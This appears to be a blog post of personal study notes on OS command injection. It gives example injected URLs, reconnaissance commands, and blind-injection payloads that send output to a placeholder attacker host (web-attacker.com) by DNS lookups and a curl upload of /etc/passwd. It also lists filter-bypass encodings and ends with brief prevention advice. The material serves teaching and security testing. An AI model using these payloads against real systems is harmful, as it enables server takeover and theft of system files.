· 6 min read Sam Verified author

OS Command Injection notes

My notes about Command Injection

Command Injection Vulnerability OWASP

Category: [Server-Side]
Severity: [High to Critical]
Impact: [Data manipulation, System takeover, Privilege escalation, etc]


1. Concept

OS Command Injection also known as Shell Injection allows an attacker to execute an Operating System command on the server that is running an application.


2. Injecting OS Commands

Example, a shopping application lets the user view a product’s info using a query via a URL:

https://example.com/products?productId=31&storeId=12

in this case we imagine that the application runs a shell command to provide the product info:

./product.sh 31 12

This command find product information and return it to show it to the user, so attacker might use this to run an arbitrary command, for instance:

https://example.com/products?productId=31&storeId=12+&&+whoami

so the command will look like this:

./product.sh 31 12 && whoami

which is mean attacker runs the whoami command. However he can run whatever he want:

https://example.com/products?productId=31&storeId=12+&&+cat+/etc/passwd
./product.sh 31 12 && cat /etc/passwd

Or the attacker might use the productId to do this:

https://example.com/products?productId=31+|+whoami+|&storeId=12
./product.sh 31 | whoami | 12

which leads to run command whoami → sam (for example)

The system will shows something like this:

Product ID: 31
Store ID  : 12
Name      : Something
Price     : 10$
...
sam

Or for the cat /etc/passwd command:

Product ID: 31
Store ID  : 12
Name      : Something
Price     : 10$
...
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
...

3. Useful Commands

Purpose of commandLinuxWindows
Name of current userwhoamiwhoami
Operating systemuname -aver
Network configurationifconfigipconfig /all
Network connectionsnetstat -annetstat -an
Running processesps -eftasklist

4. Blind OS Command Injection

Example: a website let the users submit a feedback in a feedback form. The user enters an Email address and feedback message. the server-side application using a mail program to generate the feedback and send it to admin:

mail -s "This site is great" -a From:peter@normal-user.net feedback@example.com

In such a case, the output doesn’t return to the user and sent to the admin, so it’s impossible to see the response normally. In this situations, we can use a variety of techniques to detect and exploit vulnerability.

- Detecting blind OS Command injection using time delays

Some commands like ping need some times to execute and return the results, so it’s a good command to detect and confirm a command injection bug:

& ping -c 10 127.0.0.1 & 

This command causes the application to ping its loopback network adapter for 10 seconds.

- Exploiting blind OS command injection by redirecting output

You can redirect the output from the injected command into a file within the document root and then read and retrieve it using the browser. For example, if the application serves static resources from the filesystem location /var/www/static, you can submit this input:

& whoami > /var/www/images/file.txt

You can then open https://example.com/file.txt to get the output.

- Exploiting blind OS command injection using out-of-band (OAST) techniques

You can use an injected command to interact with an out-of-band network and send the output to that server:

& nslookup $(whoami).web-attacker.com &
& nslookup `whoami`.web-attacker.com &

& dig TXT $(whoami).web-attacker.com &
& dig TXT `whoami`.web-attacker.com &

this causes a DNS record log in the server, so attacker can see the output of injected command (whoami) in a DNS query:

sam.web-attacker.com

Or over HTTP Protocol:

& whoami | curl -X POST -d @- web.attacker.com & → executes whoami
& curl -X POST -d "@/etc/passwd" web.attacker.com & → read /etc/passwd

5. Ways of injecting OS commands

&
&&
|
||
;
0x0a or %0a → new line
`injected command`
$(injected command)
%00 or \x00 → Null byte

You’ll also need " & ' to escape the quoted strings in the terminal.


6. Advanced bypasses

- Alphabet-less execution

ANSI-C Quoting: Using Octal numbers to execute a command

$'\154\163' → ls
$'\167\150\157\141\155\151' → whoami

Running several commands (using bash -c ...):

$'\142\141\163\150'\40$'\55\143'\40$'\167\150\157\141\155\151' → bash -c whoami

In sh which doesn’t support above syntaxes:

$(printf '\167\150\157\141\155\151') → whoami

- Separators filters

when < > $ & | ; are filtered:

127.0.0.1%0a<COMMAND> → %0a: URL-encoded of enter
cat$IFS/etc/passwd → Variable Expansion, $IFS is space, also ${IFS} or \40
{cat,/etc/passwd} → Brace Expansion (bash only)
cat</etc/passwd → Redirection Operators
/???/??? /???/?????? → /bin/cat /etc/passwd , Wildcard execution

- Base64 execution

echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | sh → cat /etc/passwd

- IP address filters

when standard form of IP (X.X.X.X) is filtered:

  • Octal: 0177.0000.0000.0001
  • Decimal/DWORD: 2130706433
  • Dotted format: 127.1

7. Prevent Command Injection

Most effective way: Never call an OS command to do something If you have to call an OS command using user-supplied input, perform a strong validation, example:

  • Validating against a whitelist of permitted values.
  • Validating that the input is a number.
  • Validating that the input contains only alphanumeric characters, no other syntax or whitespace.

← Return to OWASP Notes